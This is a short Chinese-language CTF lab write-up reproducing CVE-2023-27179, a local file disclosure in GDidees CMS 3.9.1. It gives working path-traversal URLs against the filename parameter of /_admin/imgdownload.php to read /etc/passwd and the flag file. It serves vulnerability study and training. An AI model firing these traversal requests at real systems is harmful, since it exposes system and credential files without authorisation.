GDidees CMS v3.9.1本地文件泄露漏洞(CVE-2023-27179)

漏洞简介:

GDidees CMS v3.9.1及更低版本被发现存在本地文件泄露漏洞,漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用。

漏洞环境:

春秋云镜中的漏洞靶标,CVE编号为CVE-2023-27179

漏洞复现:

进入靶场发现没有什么可以利用的地方,那么就按照靶场提示来,直接访问/_admin/imgdownload.php

打开后发现是一片空白,那么直接上参数filename

第一次尝试

http://eci-2ze1l7f5cevdmi4pngfi.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=../../../../../../etc/passwd

发现下载了一张图片

用notepad++打开图片发现确实获取到了用户的信息

那么直接获取flag

eci-2ze1l7f5cevdmi4pngfi.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=../../../../../../flag

或者还有一种办法是我们用bp抓包,放到重放器里,可以直接回显出文件内容

或者是直接用curl指令请求

相关推荐
黑客Ela6 分钟前
ipe网络安全
网络·web安全·php
♟彦♟3 小时前
seacmsv9管理员账号/密码注入
安全
第三方软件测评3 小时前
软件安全测评报告内容和作用简析,如何获取权威安全测评报告?
软件测试·安全
Geek极安网络安全5 小时前
2025年度福建省职业院校技能大赛高职组“信息安全管理与评估”赛项样题模块一
运维·网络·安全·web安全·php
网安CILLE5 小时前
2025年——自学黑客计划(网络安全)
linux·网络·安全·web安全·网络安全
黑客笔记7 小时前
报道称ChatGPT 成黑客编写恶意软件「利器」,如何安全使用 ChatGPT?是否应出台相应规范?
人工智能·安全·chatgpt
网络安全Ash10 小时前
Python网络安全脚本
开发语言·python·web安全
网络安全Jack10 小时前
校园的网络安全
安全·web安全
Hacker_Oldv10 小时前
网络安全和爬虫的关系
爬虫·安全·web安全